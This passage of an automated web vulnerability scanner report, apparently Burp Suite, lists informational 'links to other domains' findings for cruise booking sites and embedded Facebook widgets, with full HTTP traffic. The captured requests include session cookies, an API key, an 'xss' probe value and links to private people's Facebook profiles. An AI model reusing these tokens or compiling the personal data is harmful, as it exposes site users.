Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.42.127
X-Cnection: close
Date: Mon, 03 Oct 2011 12:40:49 GMT
Content-Length: 8515

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/xfwWw0TCQIH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/p1kOEng59HG.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/3KQwHYVeQS2.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/tRSo5dQ5Imj.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/TPy3KTYpWNB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/q7r8uOrRxLB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/_2JDxhM_bgE.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/CruisesOnly" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50273_50243286972_5242960_q.jpg" alt="CruisesOnly" /></a>
...[SNIP]...
17.32. http://www.cruises.com/results.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /results.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /results.do?searchOrigin=refine&places=ALL&days=ALL&Month=ALL&dd=ALL&d=&d2=&fd=2&c=ALL&v=ALL&p=ALL&shoppingZipCode=10010&IncludeSeniorRates=true&IncludeAlumniRates=true&AlumniCruiseId=44&sort_by=7&Search.x=28&Search.y=17&Search=Search HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/promotion/weekend-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; JSESSIONID=12B50B9A092975EDA676566C18A72E04; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; AlumniCruiseId=false; shoppingZipCode="Zip Code"; AFF%5FCID=%22%22; sid=6383; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.13.8.1317645863557; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:05 GMT
Server: Apache
Set-Cookie: WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; Expires=Thu, 30-Sep-2021 12:44:06 GMT; Path=/
Set-Cookie: IncludeAlumniRates=true; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: IncludeSeniorRates=true; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: AlumniCruiseId=44; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: shoppingZipCode=10010; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: EmailSignupComplete=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: sid=6383; Path=/
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:46:06 GMT;path=/
Cache-Control: private
Content-Length: 177692


<html>
<head profile="http://www.w3.org/2005/10/profile">


           <META NAME="Description" CONTENT="Find the best cruise and vacation deals on the Internet, make cruise and hote
...[SNIP]...
<!--
   server and timestamp info:blweb23:Mon Oct 03 08:44:05 EDT 2011
-->
   

<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<div class="header_hotel_container"><a href="http://www.rooms.com" target="newwindow"><img src="/images_unique/crudotcom/CRU_NAV_Hotel_Hdr.gif" border="0" />
...[SNIP]...
<li id="navShoreExcursions"><a id="ctl00_ShoreExcursions" href="http://www.shoreexcursionsgroup.com/v/affiliate/?id=1690" target="newwindow">
shore excursions</a>
...[SNIP]...
<li id="navHotels"><a id="ctl00_hotels" href="http://www.rooms.com" target="newwindow">
hotels</a>
...[SNIP]...
<li id="navHotelsnew"><a id="ctl00_hotels" href="http://www.rooms.com" target="newwindow">
<span class="pricecolor" style="color:#ff0000;">
...[SNIP]...
</script>    
   

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</table>
   

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<noscript>
<a href="http://www.boldsoft.com" title="Live Chat Software" target="_blank"><img alt="Live Chat Software" src="https://vms.boldchat.com/aid/664584437666327480/bc.vmi?wdid=3014984921609837532" border="0" width="1" height="1" /></a>
...[SNIP]...
<noscript>
<img width="1" height="1" src="https://tracker.marinsm.com/tp?act=1&cid=7871bv11074&script=no" >
</noscript>
...[SNIP]...
<td valign="top">
                               <a href="http://nlg.com/PR_20110823.html" target="newwindow"><img src="/images_unique/promotions/MostEngaged_Logo.gif" alt="" border="0" />
...[SNIP]...
<td valign="middle">            
                               <a href="http://www.worldtravelholdings.com/" target="blank" class="smlink">World Travel Holdings</a>
...[SNIP]...
</a> | -->
                               <a href="http://www.rooms.com" target="blank" class="smlink">Rooms.com</a>
                               
                                   | <a href="http://www.vacationoutlet.com" target="blank" class="smlink">VacationOutlet.com</a>
                               
                               | <a href="http://www.villasofdistinction.com" target="blank" class="smlink">VillasOfDistinction.com</a>
...[SNIP]...
17.33. http://www.cruises.com/sc.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /sc.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /sc.do?d=10/03/2011&d2=04/02/2014&i=852431&c=1&v=46&IncludeAlumniRates=true&IncludeSeniorRates=true&zipcode=10010&statecode=&dsc=y HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/results.do?searchOrigin=refine&places=ALL&days=ALL&Month=ALL&dd=ALL&d=&d2=&fd=2&c=ALL&v=ALL&p=ALL&shoppingZipCode=10010&IncludeSeniorRates=true&IncludeAlumniRates=true&AlumniCruiseId=44&sort_by=7&Search.x=28&Search.y=17&Search=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.18.9.1317645980928; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; IncludeAlumniRates=true; IncludeSeniorRates=true; AlumniCruiseId=44; shoppingZipCode=10010; EmailSignupComplete=Yes; AFF%5FCID=%22%22; sid=6383; JSESSIONID=6FC45782F4EC10BBA7768E419D7F36EA; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d0e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:46:11 GMT
Server: Apache
Set-Cookie: WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; Expires=Thu, 30-Sep-2021 12:46:12 GMT; Path=/
Set-Cookie: IncludeAlumniRates=true; Expires=Wed, 02-Nov-2011 12:46:12 GMT; Path=/
Set-Cookie: IncludeSeniorRates=true; Expires=Wed, 02-Nov-2011 12:46:12 GMT; Path=/
Set-Cookie: AlumniCruiseId=44; Expires=Wed, 02-Nov-2011 12:46:12 GMT; Path=/
Set-Cookie: shoppingZipCode=10010; Expires=Wed, 02-Nov-2011 12:46:12 GMT; Path=/
Set-Cookie: EmailSignupComplete=Yes; Expires=Tue, 02-Oct-2012 12:46:12 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22; Expires=Wed, 02-Nov-2011 12:46:12 GMT; Path=/
Set-Cookie: sid=6383; Path=/
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d0e45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:48:12 GMT;path=/
Cache-Control: private
Content-Length: 479627


<html>
<head profile="http://www.w3.org/2005/10/profile">


           <META NAME="Description" CONTENT="Find the best cruise and vacation deals on the Internet, make cruise and hote
...[SNIP]...
<!--
   server and timestamp info:blweb18:Mon Oct 03 08:46:11 EDT 2011
-->
   

<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<div class="header_hotel_container"><a href="http://www.rooms.com" target="newwindow"><img src="/images_unique/crudotcom/CRU_NAV_Hotel_Hdr.gif" border="0" />
...[SNIP]...
<li id="navShoreExcursions"><a id="ctl00_ShoreExcursions" href="http://www.shoreexcursionsgroup.com/v/affiliate/?id=1690" target="newwindow">
shore excursions</a>
...[SNIP]...
<li id="navHotels"><a id="ctl00_hotels" href="http://www.rooms.com" target="newwindow">
hotels</a>
...[SNIP]...
<li id="navHotelsnew"><a id="ctl00_hotels" href="http://www.rooms.com" target="newwindow">
<span class="pricecolor" style="color:#ff0000;">
...[SNIP]...
</script>
           
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js"></script>
...[SNIP]...
</table>


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<noscript>
<a href="http://www.boldsoft.com" title="Live Chat Software" target="_blank"><img alt="Live Chat Software" src="https://vms.boldchat.com/aid/664584437666327480/bc.vmi?wdid=3014984921609837532" border="0" width="1" height="1" /></a>
...[SNIP]...
<noscript>
<img width="1" height="1" src="https://tracker.marinsm.com/tp?act=1&cid=7871bv11074&script=no" >
</noscript>
...[SNIP]...
<td valign="top">
                               <a href="http://nlg.com/PR_20110823.html" target="newwindow"><img src="/images_unique/promotions/MostEngaged_Logo.gif" alt="" border="0" />
...[SNIP]...
<td valign="middle">            
                               <a href="http://www.worldtravelholdings.com/" target="blank" class="smlink">World Travel Holdings</a>
...[SNIP]...
</a> | -->
                               <a href="http://www.rooms.com" target="blank" class="smlink">Rooms.com</a>
                               
                                   | <a href="http://www.vacationoutlet.com" target="blank" class="smlink">VacationOutlet.com</a>
                               
                               | <a href="http://www.villasofdistinction.com" target="blank" class="smlink">VillasOfDistinction.com</a>
...[SNIP]...
17.34. http://www.cruisesonly.com/sc.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /sc.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /sc.do?d=09/07/2011&d2=03/06/2014&i=848192&c=11&v=58&IncludeAlumniRates=&IncludeSeniorRates=&state=&zipcode=&dsc=y HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.2.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:18 GMT
Server: Apache
Set-Cookie: WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; Expires=Thu, 30-Sep-2021 12:41:18 GMT; Path=/
Set-Cookie: IncludeAlumniRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: IncludeSeniorRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AlumniCruiseId=false; Expires=Wed, 02-Nov-2011 12:41:18 GMT; Path=/
Set-Cookie: shoppingZipCode=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: EmailSignupComplete=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AFF%5FCID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sid=6386; Path=/
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:43:18 GMT;path=/
Cache-Control: private
Content-Length: 139727


<html>
<head profile="http://www.w3.org/2005/10/profile">


           <META NAME="Description" CONTENT="Find the best cruise and vacation deals on the Internet, make cruise and hote
...[SNIP]...
</script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<div class="hp_hdr_hotel_narrow">
           <a href="http://www.rooms.com" target="new window"><img src="/images_unique/CruisesOnly/header/CO_Nav_Hotel_Hdr.gif" border="0" />
...[SNIP]...
<li><a href="http://www.shoreexcursionsgroup.com/v/affiliate/?id=1689" target="_blank" class="link">Shore Excursions</a>
...[SNIP]...
</script>
           
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js"></script>
...[SNIP]...
<!-- PUT THIS GOOGLE TAG IN THE head SECTION -->
   
   <script type="text/javascript"
   src="http://partner.googleadservices.com/gampad/google_service.js">
   </script>
...[SNIP]...
</a> |
                   <a href="http://www.crystalcruise.com" onclick="CallUrchin('/Footer')">Crystal Cruises</a>
...[SNIP]...
</a> |
                   <a href="http://www.shoreexcursionsgroup.com/v/affiliate/?id=1689" target="_blank" onclick="CallUrchin('/Footer')">Shore Excursions</a>
...[SNIP]...
<!-- Advertiser 'CruisesOnly.com', Include user in segment 'Remarketing
Pixel1' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->

<img src="https://ad.yieldmanager.com/pixel?id=1163079&t=2" width="1"
height="1" />

<!-- End of segment tag -->
...[SNIP]...
<noscript>
<a href="http://www.boldsoft.com" title="Live Chat Software" target="_blank"><img alt="Live Chat Software" src="https://vms.boldchat.com/aid/664584437666327480/bc.vmi?wdid=799941433861287185" border="0" width="1" height="1" /></a>
...[SNIP]...
<noscript>
<img width="1" height="1" src="https://tracker.marinsm.com/tp?act=1&cid=7879jl5289&script=no" >
</noscript>
...[SNIP]...
<!-- begin ValueClick Retargeting -->
<img src="http://media.fastclick.net/w/tre?ad_id=25330;evt=18193;cat1=23076;cat2=23077;rand=123456789" width="1" height="1" border="0">
<!-- end ValueClick Retargeting -->
...[SNIP]...
<td valign="top">
                               <a href="http://nlg.com/PR_20110823.html" target="newwindow"><img src="/images_unique/promotions/MostEngaged_Logo.gif" alt="" border="0" />
...[SNIP]...
<td valign="middle">            
                               <a href="http://www.worldtravelholdings.com/" target="blank" class="smlink">World Travel Holdings</a>
...[SNIP]...
</a> | -->
                               <a href="http://www.rooms.com" target="blank" class="smlink">Rooms.com</a>
                               
                                   | <a href="http://www.vacationoutlet.com" target="blank" class="smlink">VacationOutlet.com</a>
                               
                               | <a href="http://www.villasofdistinction.com" target="blank" class="smlink">VillasOfDistinction.com</a>
...[SNIP]...
17.35. https://www.cruisesonly.com/bcss/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cruisesonly.com
Path:   /bcss/default.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bcss/default.asp?bn=88888888&ln=xss&custservice_submit.x=10&custservice_submit.y=8&custservice_submit=Y&CID=6386 HTTP/1.1
Host: www.cruisesonly.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/cs/default.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; AFF%5FCID=%22%22; sid=6386; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 46341
Content-Type: text/html
Set-Cookie: partnerStamp=21960764; domain=; path=/
Set-Cookie: AFF%5FCID=6386; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 46341


   <script language="Javascript" src="/lib/javascript/validation/messagingobjects.js"></script>
<script language="javascript" src="/code/javascript/JSPopup.js"></script>
   <script languag
...[SNIP]...
</script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- Advertiser 'CruisesOnly.com', Include user in segment 'Remarketing Pixel1' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="https://ad.yieldmanager.com/pixel?id=1163079&t=2" width="1" height="1" />
<!-- End of segment tag -->
...[SNIP]...
<a href="http://www.boldsoft.com" title="Live Chat Software" target="_blank"><img alt="Live Chat Software" src="https://vms.boldchat.com/aid/664584437666327480/bc.vmi?wdid=799941433861287185" border="0" width="1" height="1" /></a>
...[SNIP]...
<noscript>
<img width="1" height="1" src="https://tracker.marinsm.com/tp?act=1&cid=7879jl5289&script=no" >
</noscript>
...[SNIP]...
17.36. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39b06e04%26origin%3Dhttp%253A%252F%252Fwww.cruises.com%252Ffe5a763e4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=62&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FCruisescom%2F226995804003285&locale=en_US&sdk=joey&show_faces=false&stream=false&width=190 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.125.45
X-Cnection: close
Date: Mon, 03 Oct 2011 12:40:44 GMT
Content-Length: 5601

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/xfwWw0TCQIH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/p1kOEng59HG.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/3KQwHYVeQS2.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/tRSo5dQ5Imj.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/TPy3KTYpWNB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/q7r8uOrRxLB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/_2JDxhM_bgE.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
...[SNIP]...
<a href="#" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="Facebook Public Profile" /></a>
...[SNIP]...
17.37. http://www.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /widgets/fan.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /widgets/fan.php?api_key=09addd37a06e06e413d53e5411603783&channel_url=http%3A%2F%2Fwww.cruisesonly.com%2Fpromotion%2Fbermuda-cruises.do%3Ffbc_channel%3D1&id=50243286972&name=&width=180&connections=6&stream=&logobar=&css= HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/promotion/bermuda-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.137.53
X-Cnection: close
Date: Mon, 03 Oct 2011 12:45:27 GMT
Content-Length: 10416

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/xfwWw0TCQIH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/p1kOEng59HG.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/3KQwHYVeQS2.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/tRSo5dQ5Imj.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/TPy3KTYpWNB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/q7r8uOrRxLB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/_2JDxhM_bgE.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/CruisesOnly" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50273_50243286972_5242960_q.jpg" alt="CruisesOnly" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/simetreus.t.harris" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275016_101701446_1277136109_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=513427710" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41383_513427710_3870_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211835_57214723_2020282618_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/kmarinaro" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274788_1510239203_1857310_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1437480568" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/187649_1437480568_3635374_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000165667246" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273858_100000165667246_5859479_q.jpg" alt="" /><div class="name">
...[SNIP]...
17.38. http://www.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /widgets/fan.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

